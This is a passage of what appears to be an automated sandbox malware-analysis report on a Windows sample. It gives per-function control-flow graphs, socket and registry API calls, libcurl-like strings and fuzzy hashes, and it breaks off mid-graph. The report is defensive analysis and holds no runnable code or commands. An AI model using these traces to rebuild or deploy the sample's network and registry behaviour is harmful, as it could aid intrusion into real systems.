                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 959 428b50-428b69 960 428be6 959->960 961 428b6b-428b74 959->961 962 428be9 960->962 963 428b76-428b8d 961->963 964 428beb-428bf2 961->964 962->964 965 428bf3-428bfe call 42a550 963->965 966 428b8f-428ba7 call 406e40 963->966 973 428de4-428def 965->973 974 428c04-428c08 965->974 971 428cd9-428d16 SleepEx getsockopt 966->971 972 428bad-428baf 966->972 981 428d22 971->981 982 428d18-428d20 971->982 979 428ca6-428cb0 972->979 980 428bb5-428bb9 972->980 975 428df5-428e19 call 42a150 973->975 976 428e8c-428e95 973->976 977 428c0e-428c1d 974->977 978 428dbd-428dc3 974->978 1016 428e1b-428e26 975->1016 1017 428e88 975->1017 989 428f00-428f06 976->989 990 428e97-428e9c 976->990 984 428c35-428c48 call 42a150 977->984 985 428c1f-428c30 connect 977->985 978->962 979->971 986 428cb2-428cb8 979->986 980->964 987 428bbb-428bc2 980->987 988 428d26-428d39 981->988 982->988 1018 428c4d-428c4f 984->1018 985->984 992 428cbe-428cd4 call 42b180 986->992 993 428ddc-428dde 986->993 987->964 994 428bc4-428bcc 987->994 996 428d43-428d61 call 40d8c0 call 42a150 988->996 997 428d3b-428d3d 988->997 989->964 998 428e9e-428eb6 call 402a00 990->998 999 428edf-428eef call 3f78b0 990->999 992->973 993->962 993->973 1003 428bd4-428bda 994->1003 1004 428bce-428bd2 994->1004 1021 428d66-428d74 996->1021 997->993 997->996 998->999 1015 428eb8-428edd call 403410 * 2 998->1015 1020 428ef2-428efc 999->1020 1003->964 1011 428bdc-428be1 1003->1011 1004->964 1004->1003 1019 428dac-428db8 call 4350a0 1011->1019 1015->1020 1023 428e28-428e2c 1016->1023 1024 428e2e-428e85 call 40d090 call 434fd0 1016->1024 1017->976 1025 428c51-428c58 1018->1025 1026 428c8e-428c93 1018->1026 1019->964 1020->989 1021->964 1028 428d7a-428d81 1021->1028 1023->1017 1023->1024 1024->1017 1025->1026 1031 428c5a-428c62 1025->1031 1033 428dc8-428dd9 call 42b100 1026->1033 1034 428c99-428c9f 1026->1034 1028->964 1035 428d87-428d8f 1028->1035 1037 428c64-428c68 1031->1037 1038 428c6a-428c70 1031->1038 1033->993 1034->979 1040 428d91-428d95 1035->1040 1041 428d9b-428da1 1035->1041 1037->1026 1037->1038 1038->1026 1044 428c72-428c8b call 4350a0 1038->1044 1040->964 1040->1041 1041->964 1046 428da7 1041->1046 1044->1026 1046->1019
                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 00428C30
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 00428CF3
                                                              • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00428D0F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnectgetsockopt
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 1669343778-879669977
                                                              • Opcode ID: e90a721ae1d63c712b5c2a94237753cbd0450d00cf6e06b62034ef93ab113cfa
                                                              • Instruction ID: bc5fecae52d7d0d99890e9a6785be97cb99a369e1bdee412bcfcd41babd9e4e8
                                                              • Opcode Fuzzy Hash: e90a721ae1d63c712b5c2a94237753cbd0450d00cf6e06b62034ef93ab113cfa
                                                              • Instruction Fuzzy Hash: D4B1BE70705315AFE710CF24E885BAB7BE0AF44318F44852EF8599A3D2DB78E858C766
                                                              Function 003F2F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1145 3f2f17-3f2f8c call 8798f0 call 879ce0 1150 3f31c9-3f31cd 1145->1150 1151 3f31d3-3f31d6 1150->1151 1152 3f2f91-3f2ff4 call 3f1619 RegOpenKeyExA 1150->1152 1155 3f2ffa-3f300b 1152->1155 1156 3f31c5 1152->1156 1157 3f315c-3f31ac RegEnumKeyExA 1155->1157 1156->1150 1158 3f31b2-3f31c2 1157->1158 1159 3f3010-3f3083 call 3f1619 RegOpenKeyExA 1157->1159 1158->1156 1163 3f314e-3f3152 1159->1163 1164 3f3089-3f30d4 RegQueryValueExA 1159->1164 1163->1157 1165 3f313b-3f314b RegCloseKey 1164->1165 1166 3f30d6-3f3137 call 879bc0 call 879c50 call 879ce0 call 879af0 call 879ce0 call 878050 1164->1166 1165->1163 1166->1165
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: EnumOpen
                                                              • String ID: d
                                                              • API String ID: 3231578192-2564639436
                                                              • Opcode ID: fcca9ce95e385c69c3316ddee36e5351c5b6717d62fc0a82456f0da87c336717
                                                              • Instruction ID: 5447549420f0d02fc76a3fab0c703bf6adb2d0c390f8e8126c4b6f9221fc60c8
                                                              • Opcode Fuzzy Hash: fcca9ce95e385c69c3316ddee36e5351c5b6717d62fc0a82456f0da87c336717
                                                              • Instruction Fuzzy Hash: 0D71B4B49043199FDB50DF69D584B9EBBF0FF84308F108869E99897311D7749A88CF92
                                                              Function 003F76A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1179 3f76a0-3f76be 1180 3f76e6-3f76f2 send 1179->1180 1181 3f76c0-3f76c7 1179->1181 1183 3f775e-3f7762 1180->1183 1184 3f76f4-3f7709 call 3f72a0 1180->1184 1181->1180 1182 3f76c9-3f76d1 1181->1182 1186 3f770b-3f7759 call 3f72a0 call 3fcb20 call 778c50 1182->1186 1187 3f76d3-3f76e4 1182->1187 1184->1183 1186->1183 1187->1184
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,N=?,00000000,?,?,004007BF), ref: 003F76EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$N=?$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-1089250579
                                                              • Opcode ID: c466979bc649a6f4044851038b13e2a972d64ac5b83ccd003c5e634b9a1a5f54
                                                              • Instruction ID: bda34d31f5aeb585e612170368cb6d0edf5b1485fffed9f1447d49f15a83bd95
                                                              • Opcode Fuzzy Hash: c466979bc649a6f4044851038b13e2a972d64ac5b83ccd003c5e634b9a1a5f54
                                                              • Instruction Fuzzy Hash: 7211C4B271930C7BE512A754AC56D373F5CDBC2B5CF060914FD0467382E2619D0082F1
                                                              Function 00429290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1298 429290-4292ed call 3f76a0 1301 4293c3-4293ce 1298->1301 1302 4292f3-4292fb 1298->1302 1309 4293d0-4293e1 1301->1309 1310 4293e5-429427 call 40d090 call 434f40 1301->1310 1303 429301-429333 call 40d8c0 call 40d9a0 1302->1303 1304 4293aa-4293af 1302->1304 1322 4293a7 1303->1322 1323 429335-429364 WSAIoctl 1303->1323 1307 429456-429470 1304->1307 1308 4293b5-4293bc 1304->1308 1312 429429-429431 1308->1312 1313 4293be 1308->1313 1309->1308 1314 4293e3 1309->1314 1310->1307 1310->1312 1317 429433-429437 1312->1317 1318 429439-42943f 1312->1318 1313->1307 1314->1307 1317->1307 1317->1318 1318->1307 1321 429441-429453 call 4350a0 1318->1321 1321->1307 1322->1304 1326 429366-42936f 1323->1326 1327 42939b-4293a4 1323->1327 1326->1327 1330 429371-429390 setsockopt 1326->1330 1327->1322 1330->1327 1331 429392-429395 1330->1331 1331->1327
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0042935D
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00429388
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: 1de0ecebb0dcc7df438680221b0a89bdde237d5277e27c868b26ed0d0cba11fd
                                                              • Instruction ID: 01999b87ddff0c85c28390e542ceeae45aaef0a85d1a11e52efd5a74d26a4c15
                                                              • Opcode Fuzzy Hash: 1de0ecebb0dcc7df438680221b0a89bdde237d5277e27c868b26ed0d0cba11fd
                                                              • Instruction Fuzzy Hash: E651BE71B04305ABE710DF24C881BAAB7A5EF88318F54852EFD489B382E735AD51CB95
                                                              Function 003F75E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1351 3f75e0-3f75ed 1352 3f75ef-3f75f6 1351->1352 1353 3f7607-3f7629 socket 1351->1353 1352->1353 1354 3f75f8-3f75ff 1352->1354 1355 3f763f-3f7642 1353->1355 1356 3f762b-3f763c call 3f72a0 1353->1356 1357 3f7643-3f7699 call 3f72a0 call 3fcb20 call 778c50 1354->1357 1358 3f7601-3f7602 1354->1358 1356->1355 1358->1353
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: cfcc7422523bcb405398ad5cad1513789d366ca2f8bfc4438234efa795d1dede
                                                              • Instruction ID: d351c9ca23c506024698685904a00e902a023b7209fe481c016eb26b33b4ea7e
                                                              • Opcode Fuzzy Hash: cfcc7422523bcb405398ad5cad1513789d366ca2f8bfc4438234efa795d1dede
                                                              • Instruction Fuzzy Hash: 3B114C77B1121537EE125B68BC26FAB3F98DFC1768F060924F514A62E2D3118D5092E1
                                                              Function 0042A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1564 42a150-42a159 1565 42a250 1564->1565 1566 42a15f-42a17b 1564->1566 1567 42a181-42a1ce getsockname 1566->1567 1568 42a249-42a24f 1566->1568 1569 42a1d0-42a1f5 call 40d090 1567->1569 1570 42a1f7-42a214 call 42ef30 1567->1570 1568->1565 1578 42a240-42a246 call 434f40 1569->1578 1570->1568 1574 42a216-42a23b call 40d090 1570->1574 1574->1578 1578->1568
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 0042A1C7
                                                              Strings
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0042A23B
                                                              • getsockname() failed with errno %d: %s, xrefs: 0042A1F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: a1d73a023aa272c377887856e78ebb6cd94e3f42d6265ffc25ebb2699c6e346b
                                                              • Instruction ID: 27d3ceca67768e07631d81bb20777c787cc694bd1ffb2b39148071d5810c8d1f
                                                              • Opcode Fuzzy Hash: a1d73a023aa272c377887856e78ebb6cd94e3f42d6265ffc25ebb2699c6e346b
                                                              • Instruction Fuzzy Hash: 08212B31908280B7F6259719EC42FE7B3ACEF81328F040655FD8853151FA36698586E6
                                                              Function 0040D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1584 40d5e0-40d5ee 1585 40d5f0-40d604 call 40d690 1584->1585 1586 40d652-40d662 WSAStartup 1584->1586 1592 40d606-40d614 1585->1592 1593 40d61b-40d651 call 417620 1585->1593 1587 40d670-40d676 1586->1587 1588 40d664-40d66f 1586->1588 1587->1585 1590 40d67c-40d68d 1587->1590 1592->1593 1598 40d616 1592->1598 1598->1593
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 0040D65B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: d6e4b93891e9e78f65c0fe02427b4560a1fd47015fbee24c8659d99698fc880f
                                                              • Instruction ID: 7f05ff0a403673e0d1e083eb1141a935bec67f4bcaf1ca50f6df0f14bfa1c879
                                                              • Opcode Fuzzy Hash: d6e4b93891e9e78f65c0fe02427b4560a1fd47015fbee24c8659d99698fc880f
                                                              • Instruction Fuzzy Hash: 830176D2E4434196FB00BBB8AC1776321A06B92308F490C79DC88A12D3F73EC68DC293
                                                              Function 004BAA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1600 4baa30-4baa64 1602 4baa6a-4baaa7 call 4ae730 1600->1602 1603 4bab04-4bab09 1600->1603 1607 4baaa9-4baabd 1602->1607 1608 4bab0e-4bab13 1602->1608 1604 4bae80-4bae89 1603->1604 1610 4bab18-4bab50 1607->1610 1611 4baabf-4baac7 1607->1611 1609 4bae2e 1608->1609 1612 4bae30-4bae4a call 4aea60 call 4aebf0 1609->1612 1616 4bab58-4bab6d 1610->1616 1611->1609 1613 4baacd-4bab02 1611->1613 1625 4bae4c-4bae57 1612->1625 1626 4bae75-4bae7d 1612->1626 1613->1616 1619 4bab6f-4bab73 1616->1619 1620 4bab96-4babab socket 1616->1620 1619->1620 1622 4bab75-4bab8f 1619->1622 1620->1609 1624 4babb1-4babc5 1620->1624 1622->1624 1638 4bab91 1622->1638 1627 4babd0-4babed ioctlsocket 1624->1627 1628 4babc7-4babca 1624->1628 1630 4bae59-4bae5e 1625->1630 1631 4bae6e-4bae6f 1625->1631 1626->1604 1633 4babef-4bac0a 1627->1633 1634 4bac10-4bac14 1627->1634 1628->1627 1632 4bad2e-4bad39 1628->1632 1630->1631 1641 4bae60-4bae6c 1630->1641 1631->1626 1639 4bad3b-4bad4c 1632->1639 1640 4bad52-4bad56 1632->1640 1633->1634 1645 4bae29 1633->1645 1635 4bac37-4bac41 1634->1635 1636 4bac16-4bac31 1634->1636 1643 4bac7a-4bac7e 1635->1643 1644 4bac43-4bac46 1635->1644 1636->1635 1636->1645 1638->1609 1639->1640 1639->1645 1640->1645 1646 4bad5c-4bad6b 1640->1646 1641->1626 1650 4bac80-4bac9b 1643->1650 1651 4bace7-4bad03 1643->1651 1648 4bac4c-4bac51 1644->1648 1649 4bad04-4bad08 1644->1649 1645->1609 1653 4bad70-4bad78 1646->1653 1648->1649 1658 4bac57-4bac78 1648->1658 1649->1632 1657 4bad0a-4bad28 1649->1657 1650->1651 1659 4bac9d-4bacc1 1650->1659 1651->1649 1655 4bad7a-4bad7f 1653->1655 1656 4bada0-4badb2 connect 1653->1656 1655->1656 1660 4bad81-4bad99 1655->1660 1662 4badb3-4badcf 1656->1662 1657->1632 1657->1645 1663 4bacc6-4bacd7 1658->1663 1659->1663 1660->1662 1670 4bae8a-4bae91 1662->1670 1671 4badd5-4badd8 1662->1671 1663->1645 1669 4bacdd-4bace5 1663->1669 1669->1649 1669->1651 1670->1612 1672 4badda-4baddf 1671->1672 1673 4bade1-4badf1 1671->1673 1672->1653 1672->1673 1674 4bae0d-4bae12 1673->1674 1675 4badf3-4bae07 1673->1675 1676 4bae1a-4bae1c call 4baf70 1674->1676 1677 4bae14-4bae17 1674->1677 1675->1674 1681 4baea8-4baead 1675->1681 1680 4bae21-4bae23 1676->1680 1677->1676 1682 4bae93-4bae9d 1680->1682 1683 4bae25-4bae27 1680->1683 1681->1612 1684 4baeaf-4baeb1 call 4ae760 1682->1684 1685 4bae9f-4baea6 call 4ae7c0 1682->1685 1683->1612 1689 4baeb6-4baebe 1684->1689 1685->1689 1690 4baf1a-4baf1f 1689->1690 